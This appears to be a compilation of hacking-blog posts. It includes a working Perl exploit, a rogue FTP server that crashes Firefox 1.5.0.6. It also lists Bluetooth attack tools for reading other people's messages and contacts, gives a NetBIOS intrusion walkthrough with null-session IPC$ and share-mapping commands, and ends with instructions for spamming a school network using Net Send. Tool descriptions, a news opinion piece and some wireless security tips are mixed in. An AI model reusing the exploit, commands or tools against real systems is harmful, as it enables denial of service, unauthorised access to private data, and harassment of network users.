Mozilla Firefox FTP Request Remote DoS (Exploit)

Vulnerable Systems:
*Mozilla Firefox version 1.5.0.6 and prior.

Exploit:
#!/usr/bin/perl
#author: tomas kempinsky

use strict;
use Socket;

my $port = shift || 2121;
my $proto = getprotobyname('tcp');
my $payload = "\x32\x32\x30\x20\x5a\x0d\x0a\x33". "\x33\x31\x20\x5a\x0d\x0a\x35\x30". "\x30\x20\x44\x6f\x53\x0d\x0a\x35". "\x30\x30\x20\x5a\x0d\x0a";

socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, 1) or die "setsock: $!";

my $paddr = sockaddr_in($port, INADDR_ANY);
bind(SERVER, $paddr) or die "bind: $!";
listen(SERVER, SOMAXCONN) or die "listen: $!";
print "ftp://D:oS@\x0localhost:2121/\n";

my $client_addr;
while ($client_addr = accept(CLIENT, SERVER)) {
# find out who connected
my ($client_port, $client_ip) = sockaddr_in($client_addr);
my $client_ipnum = inet_ntoa($client_ip);
my $client_host = gethostbyaddr($client_ip, AF_INET);
print ": $client_host", "[$client_ipnum]\n";
# send them a message, close connection
print CLIENT $payload;
close CLIENT;
}

Read More

BlueTooth Hacking Tools

Discovering Bluetooth Devices :-
Before any two bluetooth enabled devices can start communicating with one another, they must carry out a procedure known as discovery. It can be carried out by scanning for other active devices within the range.

Recommended   Tools
BlueScanner	It will try to extract as much information as possible for each newly discovered device	Download
BlueSniff	It is a GUI-based utility for finding discoverable and hidden Bluetooth-enabled devices	Download
BTBrowser	It is a J2ME application that can browse and explore the technical specification of surrounding Bluetooth enabled devices. It works on phones that supports JSR-82 - the Java Bluetooth specification	Download
BTCrawler	It is a scanner for Windows Mobile based devices. It also implements the BlueJacking and BlueSnarfing attacks	-----

Hacking Bluetooth Devices :-
There are a variety of different types of bluetooth related threats and attacks that can be executed against unsuspecting mobile phone users. Following are some of the most common types of threats :-

1) BluePrinting Attack :- Information gathering is the first step in the quest to break into target system. Even BlueTooth devices can be fingerprinted or probed for information gathering using the technique known as BluePrinting. Using this one can determine manufacturer, model, version, etc. for target bluetooth enabled device.

Recommended   Tools
BluePrint	As the name suggests	Download
BTScanner	It is an information gathering tool that allows attacker to query devices without the need to carry out pairing	Download

2) BlueJack Attack :- Bluejacking is the process of sending an anonymous message from a bluetooth enabled phone to another, within a particular range without knowing the exact source of the recieved message to the recepient.

Recommended   Tools
FreeJack	Bluejacking tool written in JAVA	-----
CIHWB	Can I Hack With Bluetooth (CIHWB) is a Bluetooth security auditing framework for Windows Mobile 2005. Supports BlueSnarf, BlueJack, and some DoS attacks. Should work on any PocketPC with the Microsoft Bluetooth stack	Download

3) BlueSnarf Attack :- Bluesnarfing is the process of connecting vulnerable mobile phones through bluetooth, without knowing the victim. It involves OBEX protocol by which an attacker can forcibly push/pull sensitive data in/out of the victim's mobile phone, hence also known as OBEX pull attack.
This attack requires J2ME enabled mobile phones as the attacker tool. With J2ME enabled phone, just by using bluesnarfing tools like Blooover, Redsnarf, Bluesnarf, etc. an attacker can break into target mobile phone for stealing sensitive data such as address book, photos, mp3, videos, SMS, ......!
4) Blue Backdoor Attack :- Here, the bluetooth related vulnerability exploits the pairing mechanism that is used to establish a connection between two bluetooth enabled devices.Not only does it gives the attacker complete access and control over the target but also allows the attacker to place strategic backdoors for continued access and entry.

5) BlueBug Attack :- It was first discovered by Martin Herfurt and allows attackers to gain complete control over the data, voice and messaging channels of vulnerable target mobile phones.

Recommended   Tools
BlueBugger	Exploits the BlueBug vulnerability	Download
Bluediving	It is a Bluetooth penetration testing suite. It implements attacks like Bluebug, BlueSnarf, BlueSnarf++, BlueSmack, etc.	Download

6) The bluetooth protocol allows devices to use 16 digit long pairing codes. Unfortunately many applications continue to use only 4 digit pairing codes which can be easily brute-forced. This is known as short pairing codes.
Most slave bluetooth devices continue to use default pairing codes such as 0000, 1111, 1234, etc. So, easy to crack and gain access...!

Recommended   Tools
BTCrack	BTCrack is a Bluetooth Pass phrase (PIN) cracking tool. BTCrack aims to reconstruct the Passkey and the Link key from captured Pairing exchanges	Download

---

-: Other Powerful BlueTooth Hacking Tools :-

Transient Bluetooth Environment Auditor :- T-BEAR is a security-auditing platform for Bluetooth-enabled devices. The platform consists of Bluetooth discovery tools, sniffing tools and various cracking tools.   Download
BlueTest :- BlueTest is a Perl script designed to do data extraction from vulnerable Bluetooth-enabled devices.   Download
BTAudit :- BTAudit is a set of programs and scripts for auditing Bluetooth-enabled devices.    Download
RedFang :- It is a brute force tool that finds even non-discoverable device.
Download
BlueAlert :- A windows based tool that runs on bluetooth enabled computer and alerts the user each time a blurtooth device leaves or enters into its range.
BlueFang :- Similar to BlueAlert.
Bluestumbler :- One of the best BluePrinting tool.

Super Bluetooth Hack :- With this java software you can connect to another mobile and ….

Once connected to a another phone via bluetooth you can-

• Read his/her messages
• Read his/her contacts
• Change profile
• Play ringtone even if phone is on silent
• Play songs
• Restart the phone
• Switch off the phone
• Restore factory settings
• Change ringing volume
• Call from his phone it includes all call functions like hold, etc.

Notes:-
1) When connecting devices use a code 0000
2) At start of program on smartphones do not forget to turn on bluetooth before start of the mobile .
  Download-  Super_Bluetooth_Hack_v1.07.zip  (99 KB)

Recommended   Tools
Blooover	It is a J2ME-based auditing tool. It is intended to serve as an auditing tool to check whether a mobile phone is vulnerable. It can also be used to carry out BlueBug attack	Download
RedSnarf	One of the best bluesnarfing tool	-----
BlueSnarfer	It downloads the phone-book of any mobile device vulnerable to Bluesnarfing	Download

Read More

Wireless Hacking

Wireless networks broadcast their packets using radio frequency or optical wavelengths. A modern laptop computer can listen in. Worse, an attacker can manufacture new packets on the fly and persuade wireless stations to accept his packets as legitimate.
The step by step procerdure in wireless hacking can be explained with help of different topics as follows:-

1) Stations and Access Points :- A wireless network interface card (adapter) is a device, called a station, providing the network physical layer over a radio link to another station.
An access point (AP) is a station that provides frame distribution service to stations associated with it.
The AP itself is typically connected by wire to a LAN. Each AP has a 0 to 32 byte long Service Set Identifier (SSID) that is also commonly called a network name. The SSID is used to segment the airwaves for usage.

2) Channels :- The stations communicate with each other using radio frequencies between 2.4 GHz and 2.5 GHz. Neighboring channels are only 5 MHz apart. Two wireless networks using neighboring channels may interfere with each other.

3) Wired Equivalent Privacy (WEP) :- It is a shared-secret key encryption system used to encrypt packets transmitted between a station and an AP. The WEP algorithm is intended to protect wireless communication from eavesdropping. A secondary function of WEP is to prevent unauthorized access to a wireless network. WEP encrypts the payload of data packets. Management and control frames are always transmitted in the clear. WEP uses the RC4 encryption algorithm.

4) Wireless Network Sniffing :- Sniffing is eavesdropping on the network. A (packet) sniffer is a program that intercepts and decodes network traffic broadcast through a medium. It is easier to sniff wireless networks than wired ones. Sniffing can also help find the easy kill as in scanning for open access points that allow anyone to connect, or capturing the passwords used in a connection session that does not even use WEP, or in telnet, rlogin and ftp connections.

5 ) Passive Scanning :- Scanning is the act of sniffing by tuning to various radio channels of the devices. A passive network scanner instructs the wireless card to listen to each channel for a few messages. This does not reveal the presence of the scanner. An attacker can passively scan without transmitting at all.

6) Detection of SSID :- The attacker can discover the SSID of a network usually by passive scanning because the SSID occurs in the following frame types: Beacon, Probe Requests, Probe Responses, Association Requests, and Reassociation Requests. Recall that management frames are always in the clear, even when WEP is enabled.
When the above methods fail, SSID discovery is done by active scanning

7) Collecting the MAC Addresses :- The attacker gathers legitimate MAC addresses for use later in constructing spoofed frames. The source and destination MAC addresses are always in the clear in all the frames.

8) Collecting the Frames for Cracking WEP :- The goal of an attacker is to discover the WEP shared-secret key. The attacker sniffs a large number of frames An example of a WEP cracking tool is AirSnort ( http://airsnort.shmoo.com ).

9) Detection of the Sniffers :- Detecting the presence of a wireless sniffer, who remains radio-silent, through network security measures is virtually impossible. Once the attacker begins probing (i.e., by injecting packets), the presence and the coordinates of the wireless device can be detected.

10) Wireless Spoofing :- There are well-known attack techniques known as spoofing in both wired and wireless networks. The attacker constructs frames by filling selected fields that contain addresses or identifiers with legitimate looking but non-existent values, or with values that belong to others. The attacker would have collected these legitimate values through sniffing.

11) MAC Address Spoofing :- The attacker generally desires to be hidden. But the probing activity injects frames that are observable by system administrators. The attacker fills the Sender MAC Address field of the injected frames with a spoofed value so that his equipment is not identified.

12) IP spoofing :- Replacing the true IP address of the sender (or, in rare cases, the destination) with a different address is known as IP spoofing. This is a necessary operation in many attacks.

13) Frame Spoofing :- The attacker will inject frames that are valid but whose content is carefully spoofed.

14) Wireless Network Probing :- The attacker then sends artificially constructed packets to a target that trigger useful responses. This activity is known as probing or active scanning.

15) AP Weaknesses :- APs have weaknesses that are both due to design mistakes and user interfaces

16) Trojan AP :- An attacker sets up an AP so that the targeted station receives a stronger signal from it than what it receives from a legitimate AP.

17) Denial of Service :- A denial of service (DoS) occurs when a system is not providing services to authorized clients because of resource exhaustion by unauthorized clients. In wireless networks, DoS attacks are difficult to prevent, difficult to stop. An on-going attack and the victim and its clients may not even detect the attacks. The duration of such DoS may range from milliseconds to hours. A DoS attack against an individual station enables session hijacking.

18) Jamming the Air Waves :- A number of consumer appliances such as microwave ovens, baby monitors, and cordless phones operate on the unregulated 2.4GHz radio frequency. An attacker can unleash large amounts of noise using these devices and jam the airwaves so that the signal to noise drops so low, that the wireless LAN ceases to function.

19) War Driving :- Equipped with wireless devices and related tools, and driving around in a vehicle or parking at interesting places with a goal of discovering easy-to-get-into wireless networks is known as war driving. War-drivers (http://www.wardrive.net) define war driving as “The benign act of locating and logging wireless access points while in motion.” This benign act is of course useful to the attackers.
Regardless of the protocols, wireless networks will remain potentially insecure because an attacker can listen in without gaining physical access.

Tips for Wireless Home Network Security

1) Change Default Administrator Passwords (and Usernames)
2) Turn on (Compatible) WPA / WEP Encryption
3) Change the Default SSID
4) Disable SSID Broadcast
5) Assign Static IP Addresses to Devices
6) Enable MAC Address Filtering
7) Turn Off the Network During Extended Periods of Non-Use
8) Position the Router or Access Point Safely

Read More

Email Security Best Practices from Microsoft

Over the years, Microsoft has taken its lumps when it comes to security however as a company, they have taken some pretty impressive strides to make sure that their products are more secure.
However, their security efforts have not been limited to just their products. They have launched several educational campaigns aimed at helping users better secure their computers and networks.
These efforts can be seen by Microsoft’s latest report, Microsoft Security Intelligence Report, and its corresponding website.
This project was set up to provide businesses and consumers with hard data concerning security risks and best practices from Microsoft themselves on how to mitigate the various risks.
Being the producer of the most popular email client software packages – Outlook, Hotmail, Outlook Express and Windows Live Mail – they have a definite interest when it comes to helping users guard against email threats.
Spam, according to Microsoft:

• Wastes resources
• Distracts recipients
• Puts assets at risk for greater security problems
• Provides an avenue for social and criminal hacking attempts
• Provides an avenue for phishing scams against users

While stopping these issues definitely is a concern for Microsoft internally, educating their customers on how to eliminate the problems associated with spam will certainly help them sell more products to people looking for the most secure product on the market.

A Look Inside Microsoft

According to their website, Microsoft filters between five to ten million email messages every day that contain malware and/or spam. On a daily basis, they see threats that include spyware, worms, attacks from botnets and polymorphic viruses attacking their email messaging systems. Each day more than 100 different types of executable files are removed from incoming messages sent to Microsoft employees.
So we can safely say that as an organization, there is little that they haven’t seen when it comes to protecting email systems.
To best fight the many different threats facing email, all inbound email to Microsoft much pass a three-tiered process to include anti-malware scanning, file removal and spam filtering.
The importance of this approach is simple. Stop threats before they reach the user.
Incorporating an anti-malware scan into messaging systems helps protect the integrity of your systems because threats can be stopped before a user has the opportunity to allow infected files to compromise a computer or network.
Likewise, a file removal process prevents malicious executables sent via email attachment from ever having the chance to launch. Followed with adequate spam filtering, this process reduces the need for organizations to rely solely on a desktop based security solution or a network firewall. Both of which do not provide comprehensive protection on their own.
These strategies seem like common sense steps that we would hardly need to rely on Microsoft to provide. However many organizations neglect to incorporate these simple strategies into their planning.

Other Ideas from Redmond

Keeping systems protected cannot be done by simply scanning incoming messages for threats. Other steps need to be taken. The best practices that Microsoft recommends to organizations are as follows:

• Provide email submission services on port 587.
• Require SMTP authentication for email submissions.
• Abstain from interfering with connectivity to port 587.
• Configure email client software to use port 587 and authentication for email submission.
• Block access to port 25 from all hosts on your network other than those you explicitly authorize to perform SMTP relay functions.
• Monitor outbound email traffic patterns and look for deviations from normal behavior, such as abnormally large bursts of email traffic.
• Disable computers or individual email accounts that have been compromised and are being used to send out spam.
• When possible, process abuse complaints from third parties for email that originated from your mail servers. These complaints often point the way to a compromised computer.

As email administrators, we tend to look to hardware and software solutions to keep things running smoothly and securely. However, protecting systems and users from threats is ultimately our responsibility. Knowing the best way to do so is part of the job description.
Turning to experts for advice when it comes to security does not mean we are unable to do things on our own, it means we are wise enough to use what works and smart enough to know where to look.

Read More

WebSurgery – Web Application Security Testing Suite

WebSurgery is a suite of tools for security testing of web applications. It was designed for security auditors to help them with the web application planning and exploitation. Currently, it uses an efficient, fast and stable Web Crawler, File/Dir Brute forcer, Fuzzer for advanced exploitation of known and unusual vulnerabilities such as SQL Injection, Cross site scripting (XSS), Brute force for login forms, identification of firewall-filtered rules, DOS Attacks and WEB Proxy to analyze, intercept and manipulate the traffic between your browser and the target web application.
WEB Crawler
WEB Crawler was designed to be fast, accurate, stable, completely parametrable and the use of advanced techniques to extract links from Javascript and HTML Tags. It works with parametrable timing settings (Timeout, Threading, Max Data Size, Retries) and a number of rules parameters to prevent infinitive loops and pointless scanning (Case Sensitive, Dir Depth, Process Above/Below, Submit Forms, Fetch Indexes/Sitemaps, Max Requests per File/Script Parameters). It is also possible to apply custom headers (user agent, cookies etc) and Include/Exclude Filters. WEB Crawler come with an embedded File/Dir Brute Forcer which helps to directly brute force for files/dirs in the directories found from crawling.
WEB Bruteforcer
WEB Bruteforcer is a brute forcer for files and directories within the web application which helps to identify the hidden structure. It is also multi-threaded and completely parametrable for timing settings (Timeout, Threading, Max Data Size, Retries) and rules (Headers, Base Dir, Brute force Dirs/Files, Recursive, File’s Extension, Send GET/HEAD, Follow Redirects, Process Cookies and List generator configuration).
By default, it will brute force from root / base dir recursively for both files and directories. It sends both HEAD and GET requests when it needs it (HEAD to identify if the file/dir exists and then GET to retrieve the full response).
WEB Fuzzer
WEB Fuzzer is a more advanced tool to create a number of requests based on one initial request. Fuzzer has no limits and can be used to exploit known vulnerabilities such (blind) SQL Inections and more unsual ways such identifing improper input handling, firewall/filtering rules, DOS Attacks.
WEB Editor
A simple WEB Editor to send individual requests. It also contains a HEX Editor for more advanced requests.
WEB Proxy
WEB Proxy is a proxy server running locally and will allow you to analyze, intercept and manipulate HTTP/HTTPS requests coming from your browser or other application which support proxies.
You can download WebSurgery here:
Setup – setup.msi
Portable – websurgery.zip

Read More

14 SepWAVSEP – Web Application Vulnerability Scanner Evaluation Project Want to Learn Penetration Testing

The author of WAVSEP (Shay Chen) e-mailed quite some time back about this project, but I have to say I honestly didn’t have time to look at it back then. It popped back up on my radar again when it was mentioned by the author of – Arachni v0.3 – his tool did extremely well in the WAVSEP tests.
The benchmark tests the SQL Injection and Reflected XSS vulnerability detection accuracy of12 commercial web application scanners and 48 free & open source web application scanners, and discusses the capabilities of many others (including information about a potential Trojan horse in one of them).
In addition to the benchmark, the author has published a detailed feature comparison between all the scanners (which generally include every open source or free to use web application vulnerability scanner commonly available)
The research compares the following aspects of these tools:

• Number & Type of Vulnerability Detection Features
• SQL Injection Detection Accuracy
• Reflected Cross Site Scripting Detection Accuracy
• General & Special Scanning Features

And what the author believes to me most important is that during his research he has developed a toolkit that can be used by any individual or organization to test the accuracy of web application scanners in a very detailed and accurate manner.
I for one applaud his efforts and I think this is a great project, of course there’s no completely objective ranking for these kind of things – but this study does give you a good idea of where different apps stand especially in terms of SQL Injection and XSS detection.
A lot of the tools we’ve written about here at Darknet come out tops (unsurprisingly).
The benchmark and reports (about 13 in total) can be found here:
http://sectooladdict.blogspot.com/
The framework for assessing vulnerability scanners was implemented in JEE and can be downloaded here:
wavsep-v1.0.3-war.zip

Read More

Lilith – Web Application Security Audit Tool

LiLith is a tool written in Perl to audit web applications. This tool analyses webpages and looks for html form tags , which often refer to dynamic pages that might be subject to SQL injection or other flaws. It works as an ordinary spider and analyses pages, following hyperlinks, injecting special characters that have a special meaning to any underlying platform.
Any Web applications scanner can never perform a full 100% correct audit. Therefore, a manual re-check is necessary. Hence, be aware that Lilith might come up with several false positives.
LiLith is a program that verifies the security of a web application. As a security consultant, the author often sees web applications that contain security flaws. A web application is a complex entity and cannot be fully checked with “just any tool”, therefor I recommend you to manually verify any results.
How the entire “scanning” process works is different from so called “CGI scanners”, such as nikto and n-stealth. This program will surf to a website and crawls through all the links, just as a user would to. On any possible input field, such as text boxes, page id’s, … LiLith will attempt to inject any characters that might have a special meaning for any underlying technology such as SQL.
For more information, it is recommended to read the following white paper: web dissection using lilith.
You can download Lilith here:
lilith-06atar.gz

Read More

VeriSign Demands The Power To Take Down Websites/Domains

I was scanning the news today, and nothing much was going on. There were some half-arsed stories about Anonymous and LulzSec – but nothing really worth writing about. And then, and then I spotted this, which quite frankly scares the shit out of me.
As much as it may well have a use in law enforcement, I’m sorry but I don’t want any single organization, corporation or entity to have the power to take out domains.
It’s just plain wrong, and well the UK has already started tabling something like this back in September.

VeriSign, which manages the database of all .com internet addresses, wants powers to shut down “non-legitimate” domain names when asked to by law enforcement.
The company said today it wants to be able to enforce the “denial, cancellation or transfer of any registration” in any of a laundry list of scenarios where a domain is deemed to be “abusive”.
VeriSign should be able to shut down a .com or .net domain, and therefore its associated website and email, “to comply with any applicable court orders, laws, government rules or requirements, requests of law enforcement or other governmental or quasi-governmental agency, or any dispute resolution process”, according to a document it filed today with domain name industry overseer ICANN.
The company has already helped law enforcement agencies in the US, such as the Immigration and Customs Enforcement agency, seize domains that were allegedly being used to sell counterfeit goods or facilitate online piracy, when the agency first obtained a court order.
That seizure process has come under fire because, in at least one fringe case, a seized .com domain’s website had already been ruled legal by a court in its native Spain.
Senior ICE agents are on record saying that they believe all .com addresses fall under US jurisdiction.
But the new powers would be international and, according to VeriSign’s filing, could enable it to shut down a domain also when it receives “requests from law enforcement”, without a court order.

Yes VeriSign do manage all the .com and .net domains, but they aren’t technically ruled under the US jurisdiction – there are plenty of .com domains that are hosted outside of the US, including the DNS infrastructure.
What I’m especially interested in, is how they plan to handle the fact that lots of things are illegal in some countries and perfectly legal in others. The part that scares me is they will be able to take down a domain without a court order, just on ‘request’ from a law enforcement agency.
To me, that opens it up to abuse – if you are going to do something like this, at least institute a due process to manage it properly.

“Various law enforcement personnel, around the globe, have asked us to mitigate domain name abuse, and have validated our approach to rapid suspension of malicious domain names,” VeriSign told ICANN, describing its system as “an integrated response to criminal activities that utilize Verisign-managed [top-level domains] and DNS infrastructure”.
The company said it has already cooperated with US law enforcement, including the FBI, to craft the suspension policies, and that it intends to also work with police in Europe and elsewhere.
It’s not yet clear how VeriSign would handle a request to suspend a .com domain that was hosting content legal in the US and Europe but illegal in, for example, Saudi Arabia or Uganda.
VeriSign made the request in a Registry Services Evaluation Process (RSEP) document filed today with ICANN. The RSEP is currently the primary mechanism that registries employ when they want to make significant changes to their contracts with ICANN.
The request also separately asks for permission to launch a “malware scanning service”, not dissimilar to the one recently introduced by ICM Registry, manager of the new .xxx extension.
That service would enable VeriSign to scan all .com websites once per quarter for malware and then provide a free “informational only” security report to the registrar responsible for the domain, which would then be able to take re-mediation action. It would be a voluntary service.

Scary thoughts really. However the malware scanning service sounds like something that would help the Internet clean up all the nasty stuff, but then again – do the registrars really care, and would they respond?
Either way, I don’t like the fact that these draconian control laws may be placed on the Internet as we know – that basically allow US law enforcement agencies to take down domains as they please.
What I’m guessing, if this is implemented, it may well become a major target for Social Engineering efforts. What’s more effective than a traditional DDoS attack? Having the domain completely killed by VeriSign – that’s what.
Source: The Register

Read More

DirBuster – Brute Force Directories & Files Names

DirBuster is another great tool from the OWASP chaps, it’s basically a multi threaded java application designed to brute force directories and files names on web/application servers. Often is the case now of what looks like a web server in a state of default installation is actually not, and has pages and applications hidden within. DirBuster attempts to find these.
However tools of this nature are often as only good as the directory and file list they come with. A different approach was taken to generating this. The list was generated from scratch, by crawling the Internet and collecting the directory and files that are actually used by developers! DirBuster comes a total of 9 different lists (Further information can be found below), this makes DirBuster extremely effective at finding those hidden files and directories. And if that was not enough DirBuster also has the option to perform a pure brute force, which leaves the hidden directories and files nowhere to hide! If you have the time ;)
What DirBuster can do for you

- Attempt to find hidden pages/directories and directories with a web application, thus giving a another attack vector (For example. Finding an unlinked to administration page).
What DirBuster will not do for you
- Exploit anything it finds. This is not the purpose of DirBuster. DirBuster sole job is to find other possible attack vectors.
How does DirBuster help in the building of secure applications?
- By finding content on the web server or within the application that is not required.
- By helping developers understand that by simply not linking to a page does not mean it can not be accessed.
You can download DirBuster here:
Linux – DirBuster-0.12.tar.bz2
Windows – DirBuster-0.12-Setup.exe
Mac – DirBuster-0.11.1.dmg

Read More

Remote Network Penetration via NetBIOS- NetBios Hacking

These are basic techniques but very useful when penetration testing any Windows based network, the techniques were discovered on WinNT but are still very valid on Windows2000 and in some cases Windows2003 due to backwards compatibility.
This article is being written in a procedural manner. I have approached it much like an intruder would actually approach a network penetration. Most of the techniques discussed in this text are rather easy to accomplish once one understands how and why something is being done.
When targetting a given network, the first thing an intruder would do, would be to portscan the remote machine or network. A lot of information can be gathered by a simple port scan but what the intruder is looking for is an open port 139 – the Default NetBios port. It’s surprising how methodical an attack can become based on the open ports of a target machine. You should understand that it is the norm for an NT machine to display different open ports than a Unix machine.
Intruders learn to view a portscan and tell wether it is an NT or Unix machine with fairly accurate results. Obviously there are some exceptions to this, but generally it can be done.
Recently, several tools have been released to fingerprint a machine remotely, but this functionality has not been made available for NT.
Information gathering with NetBIOS can be a fairly easy thing to accomplish, albeit a bit time consuming. NetBIOS is generally considered a bulky protocol with high overhead and tends to be slow, which is where the consumption of time comes in.
If the portscan reports that port 139 is open on the target machine, a natural process follows. The first step is to issue an NBTSTAT command.
The NBTSTAT command can be used to query network machines concerning NetBIOS information. It can also be useful for purging the NetBIOS cache and preloading the LMHOSTS file. This one command can be extremely useful when performing security audits.
Interpretation the information can reveal more than one might think.
Usage: nbtstat [-a RemoteName] [-A IP_address] [-c] [-n] [-R] [-r] [-S] [-s] [interval]

Switches
   -a    Lists the remote computer's name table given its host name.
   -A    Lists the remote computer's name table given its IP address.
   -c    Lists the remote name cache including the IP addresses.
   -n    Lists local NetBIOS names.
   -r    Lists names resolved by broadcast and via WINS.
   -R    Purges and reloads the remote cache name table.
   -S    Lists sessions table with the destination IP addresses.
   -s    Lists sessions table conversions.

The column headings generated by NBTSTAT have the following meanings:

Input
     Number of bytes received.
Output
     Number of bytes sent.
In/Out
     Whether the connection is from the computer (outbound)
     or from another system to the local computer (inbound).
Life
     The remaining time that a name table cache entry will "live"
     before your computer purges it.
Local Name
     The local NetBIOS name given to the connection.
Remote Host
     The name or IP address of the remote host.
Type
     A name can have one of two types: unique or group.
     The last byte of the 16 character NetBIOS name often
     means something because the same name can be present
     multiple times on the same computer. This shows the last
     byte of the name converted into hex.
State
     Your NetBIOS connections will be shown in one of the
     following "states": 

State                   Meaning

Accepting         An incoming connection is in process.

Associated        The endpoint for a connection has been created
                      and your computer has associated it with an IP
                      address.

Connected         This is a good state! It means you're connected
                       to the remote resource.

Connecting        Your session is trying to resolve the name-to-IP
                       address mapping of the destination resource.

Disconnected      Your computer requested a disconnect, and it is
                        waiting for the remote computer to do so.

Disconnecting     Your connection is ending.

Idle              The remote computer has been opened in the current
                   session, but is currently not accepting connections.

Inbound           An inbound session is trying to connect.

Listening         The remote computer is available.

Outbound          Your session is creating the TCP connection.

Reconnecting      If your connection failed on the first attempt,
                        it will display this state as it tries to reconnect.

Here is a sample NBTSTAT response of my NT Box:

C:\>nbtstat -A 195.171.236.139

       NetBIOS Remote Machine Name Table

   Name               Type         Status
---------------------------------------------
MR_B10NDE      <00>  UNIQUE      Registered
WINSEKURE LABS <00>  GROUP       Registered
MR_B10NDE      <03>  UNIQUE      Registered
MR_B10NDE      <20>  UNIQUE      Registered
WINSEKURE LABS <1E>  GROUP       Registered

MAC Address = 44-45-53-54-00-00

Using the table below, what can you learn about the machine?

Name   Number  Type  Usage
=========================================================================
 00  U  Workstation Service
 01  U  Messenger Service
<\\_MSBROWSE_> 01  G  Master Browser
 03  U  Messenger Service
 06  U  RAS Server Service
 1F  U  NetDDE Service
 20  U  File Server Service
 21  U  RAS Client Service
 22  U  Exchange Interchange
 23  U  Exchange Store
 24  U  Exchange Directory
 30  U  Modem Sharing Server Service
 31  U  Modem Sharing Client Service
 43  U  SMS Client Remote Control
 44  U  SMS Admin Remote Control Tool
 45  U  SMS Client Remote Chat
 46  U  SMS Client Remote Transfer
 4C  U  DEC Pathworks TCPIP Service
 52  U  DEC Pathworks TCPIP Service
 87  U  Exchange MTA
 6A  U  Exchange IMC
 BE  U  Network Monitor Agent
 BF  U  Network Monitor Apps
 03  U  Messenger Service
 00  G  Domain Name
 1B  U  Domain Master Browser
 1C  G  Domain Controllers
 1D  U   Master Browser
 1E  G  Browser Service Elections
 1C  G  Internet Information Server
 00  U  Internet Information Server
 [2B]  U  Lotus Notes Server
IRISMULTICAST [2F]  G  Lotus Notes
IRISNAMESERVER [33]  G  Lotus Notes
Forte_$ND800ZA [20]  U  DCA Irmalan Gateway Service

Unique (U): The name may have only one IP address assigned to it. On a network device, multiple occurences of a single name may appear to be registered, but the suffix will be unique, making the entire name unique.
Group (G): A normal group; the single name may exist with many IP addresses.
Multihomed (M): The name is unique, but due to multiple network interfaces on the same computer, this configuration is necessary to permit the registration. Maximum number of addresses is 25.
Internet Group (I): This is a special configuration of the group name used to manage WinNT domain names.
Domain Name (D): New in NT 4.0.
An intruder could use the table above and the output from an nbtstat against your machines to begin gathering information about them. With this information an intruder can tell, to an extent, what services are running on the target machine and sometimes what software packages have been installed. Traditionally, every service or major software package comes with it’s share of vulnerabilities, so this type of information is certainly useful to an intruder.
The next step for an intruder would be to try and list the open shares on the given computer, using the net view command, Here is an example of the net view command used against my box with the open shares C:\ and C:\MP3S\

C:\>net view \\195.171.236.139
Shared resources at \\195.171.236.139

Sharename    Type         Comment
-----------------------------------------------------------------
C            Disk         Drive C:\
MP3S         Disk         My collection of MP3s
The command was completed successfully.

This information would give the intruder a list of shares which he would then use in conjunction with the net use command, a command used to enable a computer to map a share to it’s local drive, below is an example of how an intruder would map the C Share to a local G: drive which he could then browse:

C:\>net use G: \\195.171.236.139\C
The command was completed successfully.

C:\>G:

G:\>

However, If the intruder was targetting a large network rather than a single remote computer, the next logical step would be to glean possible usernames from the remote machine.
A network login consists of two parts, a username and a password. Once an intruder has what he knows to be a valid list of usernames, he has half of several valid logins.
Now, using the nbtstat command, the intruder can get the login name of anyone logged on locally at that machine. In the results from the nbtstat command, entries with the <03> identifier are usernames or computernames. Gleaning usernames can also be accomplished through a null IPC session and the SID tools
The IPC$ (Inter-Process Communication) share is a standard hidden share on an NT machine which is mainly used for server to server communication. NT machines were designed to connect to each other and obtain different types of necessary information through this share. As with many design features in any operating system, intruders have learned to use this feature for their own purposes. By connecting to this share an intruder has, for all technical purposes, a valid connection to your server. By connecting to this share as null, the intruder has been able to establish this connection without providing it with credentials.
To connect to the IPC$ share as null, an intruder would issue the following command from a command prompt:
c:\>net use \\[ip address of target machine]\ipc$ "" /user:""
If the connection is successful, the intruder could do a number of things other than gleaning a user list, but lets start with that first. As mentioned earlier, this technique requires a null IPC session and the SID tools. Written by Evgenii Rudnyi, the SID tools come in two different parts, User2sid and Sid2user. User2sid will take an account name or group and give you the corresponding SID. Sid2user will take a SID and give you the name of the corresponding user or group. As a stand alone tool, this process is manual and very time consuming. Userlist.pl is a perl script written by Mnemonix that will automate this process of SID grinding, which drastically cuts down on the time it would take an intruder to glean this information.
At this point, the intruder knows what services are running on the remote machine, which major software packages have been installed (within limits), and has a list of valid usernames and groups for that machine. Although this may seem like a ton of information for an outsider to have about your network, the null IPC session has opened other venues for information gathering. The Rhino9 team has been able to retrieve the entire native security policy for the remote machine.
Such things as account lockout, minimum password length, password age cycling, password uniqueness settings as well as every user, the groups they belong to and the individual domain restrictions for that user – all through a null IPC session. This information gathering ability will appear in Rhino9′s soon to be released Leviathan tool. Some of the tools available now that can be used to gather more information via the IPC null session will be discussed below.
With the null IPC session, an intruder could also obtain a list of network shares that may not otherwise be obtainable. For obvious reasons, an intruder would like to know what network shares you have available on your machines. For this information gathering, the standard net view command is used, as follows:
c:\>net view \\[ip address of remote machine]
Depending on the security policy of the target machine, this list may or may not be denied. Take the example below (ip address has been left out for obvious reasons):

C:\>net view \\0.0.0.0
System error 5 has occurred.

Access is denied.

C:\>net use \\0.0.0.0\ipc$ "" /user:""
The command completed successfully.

C:\>net view \\0.0.0.0
Shared resources at \\0.0.0.0

Share name   Type         Used as  Comment

---------------------------------------------------------------------
Accelerator  Disk                  Agent Accelerator share for Seagate backup
Inetpub      Disk
mirc         Disk
NETLOGON     Disk                  Logon server share
www_pages    Disk
The command completed successfully.

As you can see, the list of shares on that server was not available until after the IPC null session had been established. At this point you may begin to realize just how dangerous this IPC connection can be, but the IPC techniques that are known to us now are actually very basic. The possibilities that are presented with the IPC share are just beginning to be explored.
Once this list of shares had been given, the intruder could then proceed to issue the net use commands as described above.

Read More

Messing With School Server

Sending messages out over the network

Okay, here's how to send crazy messages to everyone in your school on a computer. In your command prompt, type

Net Send <domain> * "The server is h4x0r3d"

*Note: <domain> may not be necessary, depending on how many your school has access too. If it's just one, you can leave it out*

Where <domain> is, replace it with the domain name of your school. For instance, when you log on to the network, you should have a choice of where to log on, either to your school, or to just the local machine. It tends to be called the same as your school, or something like it. So, at my school, I use

Net Send Varndean * "The server is h4x0r3d"

The asterisk denotes wildcard sending, or sending to every computer in the domain. You can swap this for people's accounts, for example

NetSend Varndean dan,jimmy,admin "The server is h4x0r3d"

